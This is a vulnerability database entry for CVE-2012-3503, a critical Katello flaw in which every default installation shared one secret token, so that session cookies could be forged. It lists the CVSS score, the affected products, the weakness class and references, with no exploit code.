← Volver a CVEs
CVE-2012-3503
CRITICAL9.8
Descripcion
The installation script in Katello 1.0 and earlier does not properly generate the Application.config.secret_token value, which causes each default installation to have the same secret token, and allows remote attackers to authenticate to the CloudForms System Engine web interface as an arbitrary user by creating a cookie using the default secret_token.
Detalles CVE
Puntuacion CVSS v3.19.8
SeveridadCRITICAL
Vector CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Vector de ataqueNETWORK
ComplejidadLOW
Privilegios requeridosNONE
Interaccion usuarioNONE
Publicado8/25/2012
Ultima modificacion4/11/2025
Fuentenvd
Avistamientos honeypot0
Productos afectados
redhat:enterprise_linux_servertheforeman:katello
Debilidades (CWE)
CWE-798
Referencias
http://rhn.redhat.com/errata/RHSA-2012-1186.html(secalert@redhat.com)
http://rhn.redhat.com/errata/RHSA-2012-1187.html(secalert@redhat.com)
http://secunia.com/advisories/50344(secalert@redhat.com)
http://www.securityfocus.com/bid/55140(secalert@redhat.com)
https://github.com/Katello/katello/commit/7c256fef9d75029d0ffff58ff1dcda915056d3a3(secalert@redhat.com)
https://github.com/Katello/katello/pull/499(secalert@redhat.com)
http://rhn.redhat.com/errata/RHSA-2012-1186.html(af854a3a-2127-422b-91ae-364da2661108)
http://rhn.redhat.com/errata/RHSA-2012-1187.html(af854a3a-2127-422b-91ae-364da2661108)
http://secunia.com/advisories/50344(af854a3a-2127-422b-91ae-364da2661108)
http://www.securityfocus.com/bid/55140(af854a3a-2127-422b-91ae-364da2661108)
https://github.com/Katello/katello/commit/7c256fef9d75029d0ffff58ff1dcda915056d3a3(af854a3a-2127-422b-91ae-364da2661108)
https://github.com/Katello/katello/pull/499(af854a3a-2127-422b-91ae-364da2661108)
Correlaciones IOC
Sin correlaciones registradas
This product uses data from the NVD API but is not endorsed or certified by the NVD.